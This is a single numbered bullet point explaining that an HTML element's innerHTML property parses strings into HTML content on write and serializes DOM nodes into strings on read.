  • #18 An HTML element’s innerHTML property deals with creating HTML content from arbitrarily formatted strings on write access on the one hand, and with serializing HTML DOM nodes into strings on read access on the other